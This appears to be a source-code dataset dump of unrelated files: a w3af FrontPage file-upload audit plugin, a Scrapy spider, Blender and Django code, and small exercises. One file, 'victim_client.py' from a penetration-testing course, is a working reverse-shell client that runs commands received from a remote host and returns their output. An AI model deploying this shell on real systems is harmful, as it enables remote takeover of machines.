] | null | null | null | tools/w3af/w3af/plugins/audit/frontpage.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
frontpage.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
import w3af.core.data.constants.severity as severity
from w3af.core.controllers.exceptions import BaseFrameworkException
from w3af.core.controllers.plugins.audit_plugin import AuditPlugin
from w3af.core.data.bloomfilter.scalable_bloom import ScalableBloomFilter
from w3af.core.data.misc.encoding import smart_str_ignore
from w3af.core.data.fuzzer.utils import rand_alpha
from w3af.core.data.kb.vuln import Vuln
POST_BODY = ('method=put document:%s&service_name=&document=[document_name=%s'
';meta_info=[]]&put_option=overwrite&comment=&'
'keep_checked_out=false\n')
class frontpage(AuditPlugin):
"""
Tries to upload a file using frontpage extensions (author.dll).
:author: Andres Riancho (andres.riancho@gmail.com)
"""
def __init__(self):
AuditPlugin.__init__(self)
# Internal variables
self._already_tested = ScalableBloomFilter()
self._author_url = None
def _get_author_url(self):
if self._author_url is not None:
return self._author_url
for info in kb.kb.get('frontpage_version', 'frontpage_version'):
author_url = info.get('FPAuthorScriptUrl', None)
if author_url is not None:
self._author_url = author_url
return self._author_url
return None
def audit(self, freq, orig_response, debugging_id):
"""
Searches for file upload vulns using a POST to author.dll.
:param freq: A FuzzableRequest
:param orig_response: The HTTP response associated with the fuzzable request
:param debugging_id: A unique identifier for this call to audit()
"""
# Only run if we have the author URL for this frontpage instance
if self._get_author_url() is None:
return
# Only identify one vulnerability of this type
if kb.kb.get(self, 'frontpage'):
return
domain_path = freq.get_url().get_domain_path()
# Upload only once to each directory
if domain_path in self._already_tested:
return
self._already_tested.add(domain_path)
rand_file = rand_alpha(6) + '.html'
upload_id = self._upload_file(domain_path, rand_file, debugging_id)
self._verify_upload(domain_path, rand_file, upload_id, debugging_id)
def _upload_file(self, domain_path, rand_file, debugging_id):
"""
Upload the file using author.dll
:param domain_path: http://localhost/f00/
:param rand_file: <random>.html
"""
# TODO: The frontpage version should be obtained from the information
# saved in the kb by the infrastructure.frontpage_version plugin!
#
# The 4.0.2.4715 version should be dynamic!
version = '4.0.2.4715'
file_path = domain_path.get_path() + rand_file
data = POST_BODY % (version, file_path)
data += rand_file[::-1]
data = smart_str_ignore(data)
target_url = self._get_author_url()
try:
res = self._uri_opener.POST(target_url,
data=data,
debugging_id=debugging_id)
except BaseFrameworkException, e:
om.out.debug('Exception while uploading file using author.dll: %s' % e)
return None
else:
if res.get_code() in [200]:
om.out.debug('frontpage plugin seems to have successfully uploaded'
' a file to the remote server.')
return res.id
def _verify_upload(self, domain_path, rand_file, upload_id, debugging_id):
"""
Verify if the file was uploaded.
:param domain_path: http://localhost/f00/
:param rand_file: The filename that was (potentially) uploaded
:param upload_id: The id of the POST request to author.dll
"""
target_url = domain_path.url_join(rand_file)
try:
res = self._uri_opener.GET(target_url,
cache=False,
grep=False,
debugging_id=debugging_id)
except BaseFrameworkException, e:
om.out.debug('Exception while verifying if the file that was uploaded'
'using author.dll was there: %s' % e)
else:
# The file we uploaded has the reversed filename as body
if rand_file[::-1] not in res.get_body():
return
desc = ('An insecure configuration in the frontpage extensions'
' allows unauthenticated users to upload files to the'
' remote web server.')
response_ids = [upload_id, res.id] if upload_id is not None else [res.id]
v = Vuln('Insecure Frontpage extensions configuration', desc,
severity.HIGH, response_ids, self.get_name())
v.set_url(target_url)
v.set_method('POST')
om.out.vulnerability(v.get_desc(), severity=v.get_severity())
self.kb_append(self, 'frontpage', v)
def get_plugin_deps(self):
"""
:return: A list with the names of the plugins that should be run before
the current one.
"""
return ['infrastructure.frontpage_version']
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This plugin audits the frontpage extension configuration by trying to
upload a file to the remote server using the author.dll script provided
by FrontPage.
"""
| 36.160221 | 85 | 0.633308 | 838 | 6,545 | 4.78401 | 0.303103 | 0.026939 | 0.01796 | 0.022449 | 0.144176 | 0.117236 | 0.077825 | 0.077825 | 0.059366 | 0.037416 | 0 | 0.011643 | 0.291367 | 6,545 | 180 | 86 | 36.361111 | 0.852738 | 0.059587 | 0 | 0.181818 | 0 | 0 | 0.187117 | 0.034702 | 0 | 0 | 0 | 0.005556 | 0 | 0 | null | null | 0 | 0.102273 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e1fccb8698e424f72b1c5a0409aadcf08618ca1 | 428 | py | Python | example/example/spiders/javdb.py | hwpchn/AroayCloudScraper | b919eda08d411914e687be81728d4cb79a098bff | [
"MIT"
] | 11 | 2021-04-28T20:53:23.000Z | 2022-03-08T02:04:49.000Z | example/example/spiders/javdb.py | hwpchn/AroayCloudScraper | b919eda08d411914e687be81728d4cb79a098bff | [
"MIT"
] | 2 | 2021-05-13T02:31:39.000Z | 2021-07-03T14:11:26.000Z | example/example/spiders/javdb.py | hwpchn/AroayCloudScraper | b919eda08d411914e687be81728d4cb79a098bff | [
"MIT"
] | 6 | 2021-05-25T01:12:43.000Z | 2022-01-03T17:54:18.000Z | import scrapy
from aroay_cloudscraper import CloudScraperRequest
class JavdbSpider(scrapy.Spider):
name = 'javdb'
allowed_domains = ['javdb.com']
headers = {"Accept-Language": "zh-cn;q=0.8,en-US;q=0.6"}
def start_requests(self):
yield CloudScraperRequest("https://javdb.com/v/BOeQO", callback=self.parse
)
def parse(self, response):
print(response.text)
| 26.75 | 82 | 0.635514 | 51 | 428 | 5.27451 | 0.745098 | 0.05948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01227 | 0.238318 | 428 | 15 | 83 | 28.533333 | 0.812883 | 0 | 0 | 0 | 0 | 0 | 0.179907 | 0.053738 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.727273 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1e21588a29965f54305e6a3a852be97af34059ee | 274 | py | Python | 0x05-python-exceptions/2-safe_print_list_integers.py | C-distin/alx-higher_level_programming | ee018135b24ac07d40f2309a4febf21b8a25aee4 | [
"MIT"
] | null | null | null | 0x05-python-exceptions/2-safe_print_list_integers.py | C-distin/alx-higher_level_programming | ee018135b24ac07d40f2309a4febf21b8a25aee4 | [
"MIT"
] | null | null | null | 0x05-python-exceptions/2-safe_print_list_integers.py | C-distin/alx-higher_level_programming | ee018135b24ac07d40f2309a4febf21b8a25aee4 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
def safe_print_list_integers(my_list=[], x=0):
i = 0
for index in range(x):
try:
print("{:d}".format(my_list[index]), end="")
i += 1
except (ValueError, TypeError):
pass
print()
return i
| 22.833333 | 56 | 0.510949 | 36 | 274 | 3.75 | 0.722222 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021978 | 0.335766 | 274 | 11 | 57 | 24.909091 | 0.71978 | 0.062044 | 0 | 0 | 0 | 0 | 0.015625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0 | 0 | 0.2 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e216a52fcace8e51079270b0a1a4780429a1a79 | 525 | py | Python | devind_helpers/import_from_file/json_reader.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | null | null | null | devind_helpers/import_from_file/json_reader.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | 4 | 2022-02-18T09:24:05.000Z | 2022-03-31T16:46:29.000Z | devind_helpers/import_from_file/json_reader.py | devind-team/devind-django-helpers | 5c64d46a12802bbe0b70e44aa9d19bf975511b6e | [
"MIT"
] | null | null | null | """Модуль считывателя из формата json."""
import json
from typing import Iterable
from .base_reader import BaseReader
class JsonReader(BaseReader):
"""Считыватель из формата json."""
def __init__(self, path: str):
"""Конструктор считывателя из формата json.
:param path: путь к файлу
"""
super().__init__(path)
@property
def items(self) -> Iterable:
"""Перебираем строки."""
for row in json.load(open(self.path, encoding='utf-8')):
yield row
| 21.875 | 64 | 0.626667 | 61 | 525 | 5.245902 | 0.639344 | 0.084375 | 0.121875 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002558 | 0.255238 | 525 | 23 | 65 | 22.826087 | 0.815857 | 0.287619 | 0 | 0 | 0 | 0 | 0.014881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.3 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1e2a027f0a188f537a7a8f740aeb32a17712a695 | 9,762 | py | Python | sim2real_docs/create_random_values.py | agchang-cgl/sim2real-docs | 590dada30e28edda2d9d5a996d90af5989bce2fb | [
"Apache-2.0"
] | 38 | 2021-12-13T17:19:17.000Z | 2022-03-31T05:07:49.000Z | sim2real_docs/create_random_values.py | agchang-cgl/sim2real-docs | 590dada30e28edda2d9d5a996d90af5989bce2fb | [
"Apache-2.0"
] | 1 | 2022-01-17T03:17:23.000Z | 2022-01-17T03:17:23.000Z | sim2real_docs/create_random_values.py | agchang-cgl/sim2real-docs | 590dada30e28edda2d9d5a996d90af5989bce2fb | [
"Apache-2.0"
] | 4 | 2022-01-13T15:10:33.000Z | 2022-03-10T08:17:09.000Z | # Copyright FMR LLC <opensource@fidelity.com>
# SPDX-License-Identifier: Apache-2.0
"""
The script generates variations for the parameters using configuration file and stores them in respective named tuple
"""
import math
import random
from collections import namedtuple
import numpy as np
# configuration parameters
scene_options = [
"aspect_ratio",
"color_mode",
"exposure_value",
"contrast",
"crop_min_x",
"crop_max_x",
"crop_min_y",
"crop_max_y",
"resolution_x",
"resolution_y",
"resolution_percentage",
"render_engine",
]
Scene_tuple = namedtuple(
"SceneParameters", scene_options, defaults=[None] * len(scene_options)
)
light_options = [
"light_energies",
"light_x_location",
"light_y_location",
"light_z_location",
"color_hue",
"color_saturation",
"color_value",
"light_type",
]
Light_tuple = namedtuple(
"LightParameters", light_options, defaults=[None] * len(light_options)
)
camera_options = [
"camera_x_location",
"camera_y_location",
"camera_z_location",
"camera_x_rotation",
"camera_y_rotation",
"camera_z_rotation",
"camera_focal_length",
]
Camera_tuple = namedtuple(
"CameraParameters", camera_options, defaults=[None] * len(camera_options)
)
image_options = [
"image_x_scale",
"image_y_scale",
"image_z_scale",
"image_x_rotation",
"image_y_rotation",
"image_z_rotation",
"image_bbs",
"background_image_name",
"image_name",
]
Image_tuple = namedtuple(
"ImageParameters", image_options, defaults=[None] * len(image_options)
)
other_options = ["render_device_type"]
other_parameter_tuple = namedtuple(
"OtherBlenderParameters", other_options, defaults=[None] * len(other_options)
)
def random_range(configs, variable, variations):
"""
Generate random values for the variable in continous scale
"""
random_values = np.random.uniform(
configs[variable]["range"][0], configs[variable]["range"][1], variations
)
return random_values
def random_categorical_values(configs, variable, variations):
"""
Generate random values for the variable (e.g aspect ratio etc)
If weights values are not given, the function assign equal weight to all the values
"""
try:
weight_values = configs[variable]["weights"]
except:
weight_values = [1.0] * len(configs[variable]["range"])
random_values = random.choices(
configs[variable]["range"], k=variations, weights=weight_values
)
return random_values
def get_image_parameters(
n_variations: int, image_configs: dict, image_files: list, bg_list: list
):
"""
Generate scene variations based on random values in config file and creates a named tuple for each variation
"""
# sampling background images from background image files
if len(bg_list) == 0:
bg_images = [""] * len(image_files)
else:
bg_images = [random.choice(bg_list) for i in range(len(image_files))]
image_parameters_list = [Image_tuple for i in range(n_variations)]
image_scale_x_values = random_range(image_configs, "image_x_scale", n_variations)
image_scale_y_values = random_range(image_configs, "image_y_scale", n_variations)
image_scale_z_values = random_range(image_configs, "image_z_scale", n_variations)
image_rotation_x_values = random_range(
image_configs, "image_x_rotation", n_variations
)
image_rotation_y_values = random_range(
image_configs, "image_y_rotation", n_variations
)
image_rotation_z_values = random_range(
image_configs, "image_z_rotation", n_variations
)
for index, _ in enumerate(image_parameters_list):
image_parameters_list[index] = image_parameters_list[index](
image_x_scale=image_scale_x_values[index],
image_y_scale=image_scale_y_values[index],
image_z_scale=image_scale_z_values[index],
image_x_rotation=image_rotation_x_values[index],
image_y_rotation=image_rotation_y_values[index],
image_z_rotation=image_rotation_z_values[index],
image_bbs=[],
image_name=image_files[index],
background_image_name=bg_images[index],
)
return image_parameters_list
def get_other_blender_parameters(other_parameters: dict):
other_parameter_tuple_value = other_parameter_tuple(
render_device_type=other_parameters["render_device_type"]
)
return other_parameter_tuple_value
def get_camera_parameters(n_variations: int, camera_configs: dict):
"""
Generate camera variations based on random values in config file and creates a named tuple for each variation
"""
camera_parameters_list = [Camera_tuple for i in range(n_variations)]
camera_focal_length_values = random_range(
camera_configs, "camera_focal_length", n_variations
)
camera_x_location_values = random_range(
camera_configs, "camera_x_location", n_variations
)
camera_y_location_values = random_range(
camera_configs, "camera_y_location", n_variations
)
camera_z_location_values = random_range(
camera_configs, "camera_z_location", n_variations
)
camera_x_rotation_values = random_range(
camera_configs, "camera_x_rotation", n_variations
)
camera_y_rotation_values = random_range(
camera_configs, "camera_y_rotation", n_variations
)
camera_z_rotation_values = random_range(
camera_configs, "camera_z_rotation", n_variations
)
for index, _ in enumerate(camera_parameters_list):
camera_parameters_list[index] = camera_parameters_list[index](
camera_x_location=camera_x_location_values[index],
camera_y_location=camera_y_location_values[index],
camera_z_location=camera_z_location_values[index],
camera_focal_length=camera_focal_length_values[index],
camera_x_rotation=math.radians(camera_x_rotation_values[index]),
camera_y_rotation=math.radians(camera_y_rotation_values[index]),
camera_z_rotation=math.radians(camera_z_rotation_values[index]),
)
return camera_parameters_list
def get_light_parameters(n_variations: int, light_configs: dict):
"""
Generate light variations based on random values in config file and creates a named tuple for each variation
"""
light_parameters_list = [Light_tuple for i in range(n_variations)]
light_energies = random_range(light_configs, "light_energy", n_variations)
light_type_values = random_categorical_values(
light_configs, "light_types", n_variations
)
hue = random_range(light_configs, "hue", n_variations)
saturation = random_range(light_configs, "saturation", n_variations)
value = random_range(light_configs, "value", n_variations)
light_x_values = random_range(light_configs, "light_x_location", n_variations)
light_y_values = random_range(light_configs, "light_x_location", n_variations)
light_z_values = random_range(light_configs, "light_x_location", n_variations)
for index, _ in enumerate(light_parameters_list):
light_parameters_list[index] = light_parameters_list[index](
light_energies=light_energies[index],
light_x_location=light_x_values[index],
light_y_location=light_y_values[index],
light_z_location=light_z_values[index],
color_hue=hue[index],
color_saturation=saturation[index],
color_value=value[index],
light_type=light_type_values[index],
)
return light_parameters_list
def get_scene_parameters(n_variations: int, scene_config: dict):
"""
Generate scene variations based on random values in config file and creates a named tuple for each variation
"""
scene_parameters_list = [Scene_tuple for i in range(n_variations)]
aspect_ratio_values = random_categorical_values(
scene_config, "aspect_ratio", n_variations
)
color_mode_values = random_categorical_values(
scene_config, "color_modes", n_variations
)
resolution_values = random_categorical_values(
scene_config, "resolution", n_variations
)
contrast_values = random_categorical_values(scene_config, "contrast", n_variations)
render_engine_values = random_categorical_values(
scene_config, "render_engine", n_variations
)
exposure_value_values = random_range(scene_config, "exposure", n_variations)
crop_min_x_values = random_range(scene_config, "crop_min_x", n_variations)
crop_max_x_values = random_range(scene_config, "crop_max_x", n_variations)
crop_min_y_values = random_range(scene_config, "crop_min_y", n_variations)
crop_max_y_values = random_range(scene_config, "crop_max_y", n_variations)
resolution_percentage_values = random_range(
scene_config, "resolution_percentage", n_variations
)
for index, _ in enumerate(scene_parameters_list):
scene_parameters_list[index] = scene_parameters_list[index](
aspect_ratio=aspect_ratio_values[index],
color_mode=color_mode_values[index],
exposure_value=exposure_value_values[index],
contrast=contrast_values[index],
crop_min_x=crop_min_x_values[index],
crop_max_x=crop_max_x_values[index],
crop_min_y=crop_min_y_values[index],
crop_max_y=crop_max_y_values[index],
resolution_x=resolution_values[index][0],
resolution_y=resolution_values[index][1],
resolution_percentage=resolution_percentage_values[index],
render_engine=render_engine_values[index],
)
return scene_parameters_list
| 37.69112 | 117 | 0.721061 | 1,221 | 9,762 | 5.328419 | 0.112203 | 0.06763 | 0.057485 | 0.024746 | 0.332155 | 0.265447 | 0.221642 | 0.141562 | 0.096526 | 0.078389 | 0 | 0.001144 | 0.194223 | 9,762 | 258 | 118 | 37.837209 | 0.82596 | 0.094345 | 0 | 0.00939 | 1 | 0 | 0.121795 | 0.00973 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032864 | false | 0 | 0.018779 | 0 | 0.084507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e3b390506f4f42cc6868431a17b0ab8d24bbe9b | 1,487 | py | Python | 006 - Simple Netcat Replacement/victim_client.py | Danziger/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux | 040acfb55470f97a3a1c6e6d392cd0cdfc84eff8 | [
"MIT"
] | 5 | 2017-11-12T12:53:28.000Z | 2020-11-02T06:16:45.000Z | 006 - Simple Netcat Replacement/victim_client.py | cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux | 5bcbc41889c6bd65aaad312b9b429dc189b8d0d1 | [
"MIT"
] | null | null | null | 006 - Simple Netcat Replacement/victim_client.py | cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux | 5bcbc41889c6bd65aaad312b9b429dc189b8d0d1 | [
"MIT"
] | 6 | 2016-06-20T00:27:31.000Z | 2019-02-14T14:28:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import socket
import argparse
def usage():
print '\n\nExample:'
print 'victim_client.py -a 192.168.0.33 -p 9999'
exit(0)
def execute_command(cmd):
cmd = cmd.rstrip() # Remove leading whitespaces
try:
results = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except Exception, e:
results = 'Could not execute the command: ' + cmd
return results
def rcv_data(client):
try:
while True:
rcv_cmd = ''
rcv_cmd += client.recv(4096)
if not rcv_cmd:
continue
client.send(execute_command(rcv_cmd))
except Exception, e:
print str(e)
pass
def client_connect(host, port):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((host, port))
print 'Connected with %s:%d' % (host, port)
rcv_data(client)
except Exception, e:
print str(e)
client.close()
def main():
parser = argparse.ArgumentParser('Victim\'s Client Commander')
parser.add_argument('-a', '--address', type=str, help='The server IP address')
parser.add_argument('-p', '--port', type=int, help='The port number to connext with', default=9999)
args = parser.parse_args()
if args.address is None:
usage()
client_connect(args.address, args.port)
if __name__ == '__main__':
main()
| 20.652778 | 103 | 0.612643 | 190 | 1,487 | 4.663158 | 0.484211 | 0.027088 | 0.054176 | 0.047404 | 0.056433 | 0.056433 | 0 | 0 | 0 | 0 | 0 | 0.021024 | 0.264291 | 1,487 | 71 | 104 | 20.943662 | 0.788848 | 0.046402 | 0 | 0.181818 | 0 | 0 | 0.133569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.022727 | 0.068182 | null | null | 0.113636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e4760c42d92eb8588629d5fa0d2b93b95e12c74 | 178 | py | Python | etc/ChokudaiSpeedrun002/f.py | wotsushi/competitive-programming | 17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86 | [
"MIT"
] | 3 | 2019-06-25T06:17:38.000Z | 2019-07-13T15:18:51.000Z | etc/ChokudaiSpeedrun002/f.py | wotsushi/competitive-programming | 17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86 | [
"MIT"
] | null | null | null | etc/ChokudaiSpeedrun002/f.py | wotsushi/competitive-programming | 17ec8fd5e1c23aee626aee70b1c0da8d7f8b8c86 | [
"MIT"
] | null | null | null | N = int(input())
A, B = (
zip(*(map(int, input().split()) for _ in range(N))) if N else
((), ())
)
ans = len({(min(a, b), max(a, b)) for a, b in zip(A, B)})
print(ans)
| 17.8 | 65 | 0.477528 | 34 | 178 | 2.470588 | 0.529412 | 0.119048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235955 | 178 | 9 | 66 | 19.777778 | 0.617647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e4852f9f102bcb68ed58fe7a5a38d41a0ac662d | 439 | py | Python | app/serializer.py | james-muriithi/django-api | 26c9c96eafd35464366eaabf4811e0b96bb981f6 | [
"MIT"
] | null | null | null | app/serializer.py | james-muriithi/django-api | 26c9c96eafd35464366eaabf4811e0b96bb981f6 | [
"MIT"
] | null | null | null | app/serializer.py | james-muriithi/django-api | 26c9c96eafd35464366eaabf4811e0b96bb981f6 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from .models import News, User
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
exclude = ['password']
class NewsSerializer(serializers.ModelSerializer):
user = UserSerializer(read_only=True)
user_id = serializers.IntegerField()
class Meta:
model = News
fields = '__all__'
read_only_fields = ['created_at', 'id']
| 24.388889 | 50 | 0.687927 | 45 | 439 | 6.488889 | 0.555556 | 0.178082 | 0.09589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225513 | 439 | 17 | 51 | 25.823529 | 0.858824 | 0 | 0 | 0.153846 | 0 | 0 | 0.061503 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.153846 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e4d08a3857894ad1e97df4d555dfd3f9fe6e16d | 707 | py | Python | circles/migrations/0014_auto_20200506_2128.py | CoronaCircles/coronacircles | 1d86a659def276fcc0ebd7a723a48f729d6e21a1 | [
"MIT"
] | 1 | 2020-04-30T16:19:33.000Z | 2020-04-30T16:19:33.000Z | circles/migrations/0014_auto_20200506_2128.py | CoronaCircles/coronacircles | 1d86a659def276fcc0ebd7a723a48f729d6e21a1 | [
"MIT"
] | 43 | 2020-05-01T23:48:01.000Z | 2022-03-12T00:35:32.000Z | circles/migrations/0014_auto_20200506_2128.py | CoronaCircles/coronacircles | 1d86a659def276fcc0ebd7a723a48f729d6e21a1 | [
"MIT"
] | 1 | 2020-05-04T20:07:16.000Z | 2020-05-04T20:07:16.000Z | # Generated by Django 3.0.6 on 2020-05-06 19:28
from django.conf import settings
from django.db import migrations, models
def create_through_relations(apps, schema_editor):
Event = apps.get_model("circles", "Event")
Participation = apps.get_model("circles", "Participation")
for event in Event.objects.all():
for participant in event.participants.all():
Participation.objects.get_or_create(user=participant, event=event)
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("circles", "0013_auto_20200506_2117"),
]
operations = [migrations.RunPython(create_through_relations)]
| 30.73913 | 78 | 0.729844 | 86 | 707 | 5.825581 | 0.593023 | 0.071856 | 0.087824 | 0.075848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052542 | 0.165488 | 707 | 22 | 79 | 32.136364 | 0.79661 | 0.063649 | 0 | 0 | 1 | 0 | 0.093939 | 0.034848 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e5388a338ee79c0983e77ee1bfcd18dd8023b2e | 244 | py | Python | codigo/Live171/exemplo_04.py | BrunoPontesLira/live-de-python | da6e463a89ed90d9efaa1c34088ab6460e949de1 | [
"MIT"
] | 572 | 2018-04-03T03:17:08.000Z | 2022-03-31T19:05:32.000Z | codigo/Live171/exemplo_04.py | BrunoPontesLira/live-de-python | da6e463a89ed90d9efaa1c34088ab6460e949de1 | [
"MIT"
] | 176 | 2018-05-18T15:56:16.000Z | 2022-03-28T20:39:07.000Z | codigo/Live171/exemplo_04.py | BrunoPontesLira/live-de-python | da6e463a89ed90d9efaa1c34088ab6460e949de1 | [
"MIT"
] | 140 | 2018-04-18T13:59:11.000Z | 2022-03-29T00:43:49.000Z | d = {'a': 1, 'c': 3}
match d:
case {'a': chave_a, 'b': _}:
print(f'chave A {chave_a=} + chave B')
case {'a': _} | {'c': _}:
print('chave A ou C')
case {}:
print('vazio')
case _:
print('Não sei')
| 20.333333 | 46 | 0.418033 | 35 | 244 | 2.742857 | 0.428571 | 0.25 | 0.145833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012579 | 0.348361 | 244 | 11 | 47 | 22.181818 | 0.591195 | 0 | 0 | 0 | 0 | 0 | 0.237705 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e53dd376aaf61514bd9d98d45793bfdafdb09eb | 2,204 | py | Python | vb2py/PythonCard/samples/multicolumnexample/multicolumnexample.rsrc.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/samples/multicolumnexample/multicolumnexample.rsrc.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/samples/multicolumnexample/multicolumnexample.rsrc.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null |
{ 'application':{ 'type':'Application',
'name':'MulticolumnExample',
'backgrounds':
[
{ 'type':'Background',
'name':'bgMulticolumnExample',
'title':'Multicolumn Example PythonCard Application',
'size':( 620, 500 ),
'menubar':
{
'type':'MenuBar',
'menus':
[
{ 'type':'Menu',
'name':'menuFile',
'label':'&File',
'items': [
{ 'type':'MenuItem',
'name':'menuFileExit',
'label':'E&xit\tAlt+X',
'command':'exit' } ] }
]
},
'components':
[
{'type':'Button',
'name':'demoButton',
'position':(510, 5),
'size':(85, 25),
'label':'Load Demo',
},
{'type':'Button',
'name':'clearButton',
'position':(510, 30),
'size':(85, 25),
'label':'Clear',
},
{'type':'Button',
'name':'loadButton',
'position':(510, 55),
'size':(85, 25),
'label':'Load CSV',
},
{'type':'Button',
'name':'appendButton',
'position':(510, 80),
'size':(85, 25),
'label':'Append CSV',
},
{'type':'Button',
'name':'swapButton',
'position':(510, 105),
'size':(85, 25),
'label':'Swap Lists',
},
{'type':'Button',
'name':'prevButton',
'position':(510, 130),
